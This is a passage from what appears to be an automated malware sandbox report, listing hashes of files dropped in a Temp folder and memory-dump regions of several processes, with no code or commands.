                                                                                              babf7bd8ea1262607b40df777f79defc05dd0e2b

                                                                                              SHA256

                                                                                              9fc4324ba2335f2f3e090c60bc78dcb84147ecc864fd0317bfec9085fd1ed15d

                                                                                              SHA512

                                                                                              05ed251336ada8e566838c9afe2f62f65a3988f1104af2f63259986398eb1a2852324ced2111a2e70109ae15ed867dcb3c01c99c0e9aafefb064ed81c10c5072

                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\jzo0byp5\jzo0byp5.0.cs
                                                                                              Filesize

                                                                                              1004B

                                                                                              MD5

                                                                                              c76055a0388b713a1eabe16130684dc3

                                                                                              SHA1

                                                                                              ee11e84cf41d8a43340f7102e17660072906c402

                                                                                              SHA256

                                                                                              8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                              SHA512

                                                                                              22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                            • \??\c:\Users\Admin\AppData\Local\Temp\jzo0byp5\jzo0byp5.cmdline
                                                                                              Filesize

                                                                                              607B

                                                                                              MD5

                                                                                              59dabe2028aad5e36d6288b163303c78

                                                                                              SHA1

                                                                                              394f2a0e6b7ca9a458f34242c7155e69bd6e714f

                                                                                              SHA256

                                                                                              10d6ab8d0df590d8f0396867253361143781085fc699d4be307915cffb199b19

                                                                                              SHA512

                                                                                              0332ec5b77859eadb57b7504f95b8492d974f436c10d74b0159c7f4e431423f79dba363004f43a169ea2ea7d653b66eba15ba379962f7ceb47d038ff479824b8

                                                                                            • memory/1160-96-0x0000000000080000-0x0000000000092000-memory.dmp
                                                                                              Filesize

                                                                                              72KB

                                                                                            • memory/2744-97-0x00000248DC620000-0x00000248DC642000-memory.dmp
                                                                                              Filesize

                                                                                              136KB

                                                                                            • memory/2812-50-0x00007FFB52E60000-0x00007FFB52E6F000-memory.dmp
                                                                                              Filesize

                                                                                              60KB

                                                                                            • memory/2812-342-0x00007FFB3D1A0000-0x00007FFB3D26D000-memory.dmp
                                                                                              Filesize

                                                                                              820KB

                                                                                            • memory/2812-81-0x00007FFB4C880000-0x00007FFB4C88D000-memory.dmp
                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/2812-150-0x00007FFB3DCC0000-0x00007FFB3DE3E000-memory.dmp
                                                                                              Filesize

                                                                                              1.5MB

                                                                                            • memory/2812-149-0x00007FFB43D30000-0x00007FFB43D53000-memory.dmp
                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/2812-73-0x00007FFB3DF00000-0x00007FFB3E4F2000-memory.dmp
                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/2812-77-0x00007FFB50B20000-0x00007FFB50B44000-memory.dmp
                                                                                              Filesize

                                                                                              144KB

                                                                                            • memory/2812-78-0x00007FFB4C5A0000-0x00007FFB4C5B4000-memory.dmp
                                                                                              Filesize

                                                                                              80KB

                                                                                            • memory/2812-75-0x0000023E65230000-0x0000023E65759000-memory.dmp
                                                                                              Filesize

                                                                                              5.2MB

                                                                                            • memory/2812-49-0x00007FFB50B20000-0x00007FFB50B44000-memory.dmp
                                                                                              Filesize

                                                                                              144KB

                                                                                            • memory/2812-381-0x00007FFB3DCC0000-0x00007FFB3DE3E000-memory.dmp
                                                                                              Filesize

                                                                                              1.5MB

                                                                                            • memory/2812-74-0x00007FFB3CC70000-0x00007FFB3D199000-memory.dmp
                                                                                              Filesize

                                                                                              5.2MB

                                                                                            • memory/2812-70-0x00007FFB3D1A0000-0x00007FFB3D26D000-memory.dmp
                                                                                              Filesize

                                                                                              820KB

                                                                                            • memory/2812-69-0x00007FFB4C720000-0x00007FFB4C753000-memory.dmp
                                                                                              Filesize

                                                                                              204KB

                                                                                            • memory/2812-26-0x00007FFB3DF00000-0x00007FFB3E4F2000-memory.dmp
                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/2812-66-0x00007FFB4C8D0000-0x00007FFB4C8DD000-memory.dmp
                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/2812-64-0x00007FFB50EC0000-0x00007FFB50ED9000-memory.dmp
                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/2812-62-0x00007FFB3DCC0000-0x00007FFB3DE3E000-memory.dmp
                                                                                              Filesize

                                                                                              1.5MB

                                                                                            • memory/2812-60-0x00007FFB43D30000-0x00007FFB43D53000-memory.dmp
                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/2812-58-0x00007FFB4C5C0000-0x00007FFB4C5D9000-memory.dmp
                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/2812-56-0x00007FFB4C6C0000-0x00007FFB4C6ED000-memory.dmp
                                                                                              Filesize

                                                                                              180KB

                                                                                            • memory/2812-347-0x00007FFB50EC0000-0x00007FFB50ED9000-memory.dmp
                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/2812-343-0x00007FFB3CC70000-0x00007FFB3D199000-memory.dmp
                                                                                              Filesize

                                                                                              5.2MB

                                                                                            • memory/2812-83-0x00007FFB3CB50000-0x00007FFB3CC6C000-memory.dmp
                                                                                              Filesize

                                                                                              1.1MB

                                                                                            • memory/2812-341-0x00007FFB4C720000-0x00007FFB4C753000-memory.dmp
                                                                                              Filesize

                                                                                              204KB

                                                                                            • memory/2812-332-0x00007FFB3DF00000-0x00007FFB3E4F2000-memory.dmp
                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/2812-338-0x00007FFB3DCC0000-0x00007FFB3DE3E000-memory.dmp
                                                                                              Filesize

                                                                                              1.5MB

                                                                                            • memory/2812-333-0x00007FFB50B20000-0x00007FFB50B44000-memory.dmp
                                                                                              Filesize

                                                                                              144KB

                                                                                            • memory/2812-359-0x00007FFB3DF00000-0x00007FFB3E4F2000-memory.dmp
                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/2812-374-0x0000023E65230000-0x0000023E65759000-memory.dmp
                                                                                              Filesize

                                                                                              5.2MB

                                                                                            • memory/2812-375-0x00007FFB3DF00000-0x00007FFB3E4F2000-memory.dmp
                                                                                              Filesize

                                                                                              5.9MB

                                                                                            • memory/2812-386-0x00007FFB3CC70000-0x00007FFB3D199000-memory.dmp
                                                                                              Filesize

                                                                                              5.2MB

                                                                                            • memory/2812-398-0x00007FFB4C720000-0x00007FFB4C753000-memory.dmp
                                                                                              Filesize

                                                                                              204KB

                                                                                            • memory/2812-397-0x00007FFB4C8D0000-0x00007FFB4C8DD000-memory.dmp
                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/2812-396-0x00007FFB50EC0000-0x00007FFB50ED9000-memory.dmp
                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/2812-395-0x00007FFB3D1A0000-0x00007FFB3D26D000-memory.dmp
                                                                                              Filesize

                                                                                              820KB

                                                                                            • memory/2812-394-0x00007FFB43D30000-0x00007FFB43D53000-memory.dmp
                                                                                              Filesize

                                                                                              140KB

                                                                                            • memory/2812-393-0x00007FFB4C5C0000-0x00007FFB4C5D9000-memory.dmp
                                                                                              Filesize

                                                                                              100KB

                                                                                            • memory/2812-392-0x00007FFB4C6C0000-0x00007FFB4C6ED000-memory.dmp
                                                                                              Filesize

                                                                                              180KB

                                                                                            • memory/2812-391-0x00007FFB52E60000-0x00007FFB52E6F000-memory.dmp
                                                                                              Filesize

                                                                                              60KB

                                                                                            • memory/2812-390-0x00007FFB50B20000-0x00007FFB50B44000-memory.dmp
                                                                                              Filesize

                                                                                              144KB

                                                                                            • memory/2812-389-0x00007FFB3CB50000-0x00007FFB3CC6C000-memory.dmp
                                                                                              Filesize

                                                                                              1.1MB

                                                                                            • memory/2812-388-0x00007FFB4C880000-0x00007FFB4C88D000-memory.dmp
                                                                                              Filesize

                                                                                              52KB

                                                                                            • memory/2812-387-0x00007FFB4C5A0000-0x00007FFB4C5B4000-memory.dmp
                                                                                              Filesize

                                                                                              80KB

                                                                                            • memory/3412-235-0x00000216B1170000-0x00000216B1178000-memory.dmp
                                                                                              Filesize

                                                                                              32KB